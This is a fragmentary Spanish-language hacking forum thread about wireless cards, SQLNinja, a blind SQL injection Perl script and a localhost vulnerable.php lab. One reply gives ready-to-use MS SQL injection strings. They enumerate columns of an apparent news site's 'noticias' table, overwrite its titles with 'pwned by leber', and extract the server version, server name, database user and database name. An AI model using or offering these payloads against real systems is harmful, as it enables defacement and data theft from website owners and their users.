Mensajes

Hola buenas tenia idea de comprar una tarjeta con el chip "Zydas 1211b" y una antena de 9 dBi omnidireccional. ¿Qué les parece ese chip? Sirve para auditoria wireless? Puedo usar la tarjeta para conectarme desde windows y linux? Sobre que precio podría salir?

Saludos.

Esta perfecto e0n, espero la segunda parte
Te quedará un buen taller.

salu2

jajajaja en fin ...
sigue usando SQLNinja ! paso de discutir en el foro.

Saludos.

Para el SQL-blind recomiendo el SQLninja es genial !

¿De que te sirve usar una herramienta sin saber que operación realiza?

Saludos.

El argumento -p es el patron de busqueda.
Osea cuando da un valor true (cuando se muestra la información de la página correctamente), suele mostrar:

user_id, username. Cualquier palabra que aparezca cuando el valor es true puede ser el argumento -p. En la imagen que ponen de la ejecución del script en el pdf ponen en el agumento si te fijas "user_id". Claro esta que con que podrias "id" ya te valdria 

Saludos.

[Atte:GiR]

Saludos

Gracias, no me habia dado cuenta del enorme fallo pero ahora mi duda es que ejecuto el archivo perl... con cmd.exe

guardo el archivo como blind.pl voy a abrirlo con el CMD.exe y me abre un bloc de notas con el codigo =(  ?? como hago para que se ejecute devidamente?

Atte:GiR

Yo el script lo probe en WINDOWS y no rula, al parecer esta hecho para LINUX.
Pruebalo en Linux, guardas el código como blind.pl, vas a la terminal, vas al directorio donde hayas dejado el script y lo ejecutas:

# perl blind.pl <argumentos del script>

ó

# ./blind.pl <argumentos del script>

Saludos.

[Atte: GiR]

Saludos.

Tengo un problema y es que cuando he subido la base de datos... y esta todo echo pero cuando lo cargo... es decir cuando abro el archivo php... me dice "No hay columnas".
La verdad, no se donde esta el fallo, he echo bien lo del config, he subido el SQL posteado a mi base de datos y nada, me da ese error...

Atte: GiR

hombre lógico, si entras http://localhost/vulnerable.php no seleccionas ningun registro de la base de datos y el script muere diciendo que "No hay columnas":

Código (php) [Seleccionar] Expandir

if(@mysql_num_rows($query)==0){
die('No hay columnas');
}

pero si haces: http://localhost/vulnerable.php?id=1
Pues ya te saldra el usuario "administrator".

Saludos.

[versión del servidor MS SQL]

aver.......
El simbolo + no te hace falta que lo pongas antes de la coma, podria quedar asi:

Código [Seleccionar] Expandir

id=456+group+by+noticias.ANTETITULO,noticias.TITULO,noticias.ENTRADILLA,noticias.FECHA,noticias.HEAD,noticias.TEXTO+having+1=1--

Si te sigue tirando error, puede ser porque ya no existan mas columnas.
Si quieres updatear una, puedes hacer:

Código [Seleccionar] Expandir

id=456+update+noticias+set+TITULO+=+'pwned by leber'--

Si quieres obtener la versión del servidor MS SQL, con que hagas esto ya te vale:

id=1+and+1=convert(int,@@version)--

Nombre del servidor:

id=1+and+1=convert(int,@@servername)--

Nombre del usuario de la DB:

id=1+and+1=convert(int,system_user)

Nombre de la DB de la página web:

id=1+and+1=convert(int,db_name())

Espero que te sirva.

Saludos. 

w0w! 
Lo leí y esta perfecto ademas metieron códigos de ejemplo 
Asi si que se entiende 100%

Saludos.

magic_quotes_gpc